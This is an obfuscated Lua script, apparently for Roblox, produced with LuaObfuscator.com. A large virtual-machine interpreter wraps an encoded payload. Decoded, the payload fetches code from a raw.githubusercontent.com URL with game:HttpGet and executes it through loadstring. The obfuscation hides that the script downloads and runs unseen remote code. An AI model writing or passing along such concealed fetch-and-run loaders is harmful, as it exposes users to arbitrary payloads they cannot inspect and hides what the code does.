--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v82-(v82%(569 -(367 + 201))) ;else local v83=(929 -(214 + 713))^(v32-(1 + 0 + (877 -(282 + 595)))) ;return (((v31%(v83 + v83))>=v83) and 1) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (1640 -(1523 + 114)) );v19=v19 + 4 + 0 ;return (v37 * ((104146254 -80228800) -7140238)) + (v36 * (66601 -((185 -(32 + 85)) + 997))) + (v35 * (1526 -(226 + 1044))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==(374 -(123 + 251))) then v39=0 -0 ;v40=nil;v38=1;end if (v38==2) then v43=nil;v44=nil;v38=701 -(208 + 490) ;end if (3~=v38) then else v45=nil;while true do local v90=0;local v91;while true do if (v90~=(0 + 0)) then else v91=0 + 0 ;while true do if ((836 -(660 + 176))~=v91) then else local v126=0;while true do if (v126==(0 + 0)) then if (v39~=0) then else local v137=202 -(14 + 188) ;local v138;while true do if (v137==0) then v138=0;while true do if (v138~=0) then else local v156=675 -(534 + 141) ;while true do if (v156==(1 + 0)) then v138=1;break;end if (v156==(0 + 0)) then v40={};v41={};v156=1 + 0 ;end end end if (v138~=1) then else v42={};v39=1 -0 ;break;end end break;end end end if (v39~=(4 -1)) then else local v139=0;while true do if (v139~=(0 -0)) then else for v152=1,v24() do v41[v152-1 ]=v29();end return v43;end end end v126=1 + 0 ;end if (v126~=1) then else v91=1 + 0 ;break;end end end if ((397 -(115 + 281))~=v91) then else if (v39~=(4 -2)) then else local v134=0 + 0 ;while true do if (v134==1) then for v141=1,v24() do local v142=0;local v143;local v144;local v145;while true do if (v142==(2 -1)) then v145=nil;while true do if (v143==(0 -0)) then local v157=0;while true do if (v157~=1) then else v143=868 -(550 + 317) ;break;end if (v157==0) then v144=0 -0 ;v145=nil;v157=1 -0 ;end end end if (v143==1) then while true do if (v144~=0) then else v145=v22();if (v21(v145,2 -1 ,286 -(134 + 151) )~=0) then else local v161=0;local v162;local v163;local v164;local v165;local v166;while true do if (v161~=2) then else v166=nil;while true do if (v162==0) then local v168=0;while true do if (v168==1) then v162=1666 -(970 + 695) ;break;end if (v168~=0) then else v163=0 -0 ;v164=nil;v168=1;end end end if (1==v162) then local v169=0;while true do if (v169~=(1990 -(582 + 1408))) then else v165=nil;v166=nil;v169=3 -2 ;end if (v169~=1) then else v162=2;break;end end end if (v162~=(2 -0)) then else while true do if (v163==2) then local v170=0 -0 ;local v171;while true do if (v170~=0) then else v171=1824 -(1195 + 629) ;while true do if (v171==(1 -0)) then v163=3;break;end if (v171==(241 -(187 + 54))) then local v180=780 -(162 + 618) ;while true do if (v180~=(1 + 0)) then else v171=1 + 0 ;break;end if ((0 -0)~=v180) then else if (v21(v165,1 -0 ,1 + 0 )==1) then v166[1638 -(1373 + 263) ]=v45[v166[1002 -(451 + 549) ]];end if (v21(v165,2,2)~=(1 + 0)) then else v166[3]=v45[v166[3]];end v180=1;end end end end break;end end end if (v163~=0) then else local v172=0 -0 ;while true do if (v172==1) then v163=1;break;end if (v172~=(0 -0)) then else v164=v21(v145,2,3);v165=v21(v145,1388 -(746 + 638) ,6);v172=1 + 0 ;end end end if (v163==3) then if (v21(v165,3,4 -1 )~=1) then else v166[4]=v45[v166[345 -(218 + 123) ]];end v40[v141]=v166;break;end if (v163~=(1582 -(1535 + 46))) then else local v174=0;while true do if (v174~=(0 + 0)) then else v166={v23(),v23(),nil,nil};if (v164==0) then local v177=0;local v178;local v179;while true do if (v177~=(1 + 0)) then else while true do if (v178~=(0 -0)) then else v179=0;while true do if (v179~=(1467 -(899 + 568))) then else v166[2 + 1 ]=v23();v166[4]=v23();break;end end break;end end break;end if ((0 -0)~=v177) then else v178=603 -(268 + 335) ;v179=nil;v177=291 -(60 + 230) ;end end elseif (v164==1) then v166[575 -(426 + 146) ]=v24();elseif (v164==(1 + 1)) then v166[3]=v24() -(2^16) ;elseif (v164==3) then local v187=0;local v188;local v189;while true do if ((1456 -(282 + 1174))==v187) then v188=0;v189=nil;v187=812 -(569 + 242) ;end if (v187~=(2 -1)) then else while true do if (v188~=0) then else v189=0;while true do if (v189==(0 + 0)) then v166[3]=v24() -(2^16) ;v166[4]=v23();break;end end break;end end break;end end end v174=1;end if ((1025 -(706 + 318))~=v174) then else v163=2;break;end end end end break;end end break;end if (1==v161) then v164=nil;v165=nil;v161=1253 -(721 + 530) ;end if (v161==0) then v162=1271 -(945 + 326) ;v163=nil;v161=1;end end end break;end end break;end end break;end if (v142==(0 -0)) then v143=0;v144=nil;v142=1;end end end v39=3 + 0 ;break;end if (v134==(700 -(271 + 429))) then for v146=1 + 0 ,v44 do local v147=0;local v148;local v149;local v150;local v151;while true do if (v147~=1) then else local v154=1500 -(1408 + 92) ;while true do if (v154==0) then v150=nil;v151=nil;v154=1;end if (v154~=(1087 -(461 + 625))) then else v147=2;break;end end end if (v147~=2) then else while true do if (v148==(1289 -(993 + 295))) then v151=nil;while true do if (1==v149) then if (v150==1) then v151=v22()~=0 ;elseif (v150==(1 + 1)) then v151=v25();elseif (v150~=3) then else v151=v26();end v45[v146]=v151;break;end if (v149==(1171 -(418 + 753))) then local v160=0 + 0 ;while true do if (v160==0) then local v167=0 + 0 ;while true do if (v167~=1) then else v160=1 + 0 ;break;end if (v167==0) then v150=v22();v151=nil;v167=1 + 0 ;end end end if (v160~=1) then else v149=1;break;end end end end break;end if (v148~=(529 -(406 + 123))) then else local v158=0;while true do if (v158~=1) then else v148=1770 -(1749 + 20) ;break;end if (v158~=(0 + 0)) then else v149=1322 -(1249 + 73) ;v150=nil;v158=1 + 0 ;end end end end break;end if (v147~=(1145 -(466 + 679))) then else local v155=0;while true do if (v155~=1) then else v147=2 -1 ;break;end if (v155==0) then v148=0;v149=nil;v155=1;end end end end end v43[3]=v22();v134=2 -1 ;end end end if (v39~=(1901 -(106 + 1794))) then else v43={v40,v41,nil,v42};v44=v24();v45={};v39=5 -3 ;end break;end end break;end end end break;end if (1==v38) then v41=nil;v42=nil;v38=2;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=0 -0 ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(116 -(4 + 110))) then v51=v21(v48,605 -(57 + 527) ,1458 -(41 + 1386) );v52=((v21(v48,135 -(17 + 86) )==(1 + 0)) and  -1) or ((3 -2) -0) ;v46=3;end if (v46==(2 -1)) then v49=167 -(122 + 44) ;v50=(v21(v48,1 -0 ,20) * ((6 -4)^(19 + 13))) + v47 ;v46=2 + 0 ;end if (v46==(1 + 0 + 2)) then if (v51==(0 -0)) then if (v50==(65 -(30 + (885 -(20 + 830))))) then return v52 * (0 + 0) ;else local v96=0 + 0 ;while true do if (v96==(1257 -(1043 + 214))) then v51=1;v49=0 -0 ;break;end end end elseif (v51==(3259 -(323 + 889))) then return ((v50==(0 -0)) and (v52 * ((581 -((487 -(116 + 10)) + 219))/(320 -(53 + 267))))) or (v52 * NaN) ;end return v8(v52,v51-1023 ) * (v49 + (v50/(2^(1 + 11 + 40)))) ;end if (v46==(413 -(15 + 398))) then v47=v24();v48=v24();v46=(1721 -(542 + 196)) -(18 + 964) ;end end end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(0 -0)) then return "";end end v54=v3(v16,v19,(v19 + v53) -(1 + 0) );v19=v19 + v53 ;local v55={};for v66=1 + 0 , #v54 do v55[v66]=v2(v1(v3(v54,v66,v66)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + 1 + 1 );v19=v19 + (4 -2) ;return (v58 * (656 -400)) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then local v84=0;while true do if (v84==0) then v20=v0(v3(v59,1,1));return "";end end else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v59,16));if v20 then local v97=v5(v86,v20);v20=nil;return v97;else return v86;end break;end end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=3) then if (v81<=1) then if (v81>0) then local v98;local v99,v100;local v101;local v102;v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v102=v80[2];v101=v78[v80[3]];v78[v102 + 1 ]=v101;v78[v102]=v101[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v80=v68[v72];v102=v80[2];v99,v100=v71(v78[v102](v13(v78,v102 + 1 ,v80[3])));v73=(v100 + v102) -1 ;v98=0;for v121=v102,v73 do local v122=0;while true do if (v122==0) then v98=v98 + 1 ;v78[v121]=v99[v98];break;end end end v72=v72 + 1 ;v80=v68[v72];v102=v80[2];v78[v102]=v78[v102](v13(v78,v102 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];do return;end else local v112=v80[2];v78[v112]=v78[v112](v13(v78,v112 + 1 ,v73));end elseif (v81==2) then v78[v80[2]]();else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=5) then if (v81==4) then do return;end else local v115=v80[2];local v116,v117=v71(v78[v115](v13(v78,v115 + 1 ,v80[3])));v73=(v117 + v115) -1 ;local v118=0;for v123=v115,v73 do v118=v118 + 1 ;v78[v123]=v116[v118];end end elseif (v81<=6) then v78[v80[2]]=v62[v80[3]];elseif (v81>7) then v78[v80[2]]=v80[3];else local v129=v80[2];local v130=v78[v80[3]];v78[v129 + 1 ]=v130;v78[v129]=v130[v80[4]];end v72=v72 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403443O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F53696E7133322F424F5845442F6D61696E2F77686F2532307468652532306675636B00093O0012013O00013O00122O000100023O00202O00010001000300122O000300046O000400016O000100049O0000026O000100016O00017O00",v9(),...);end
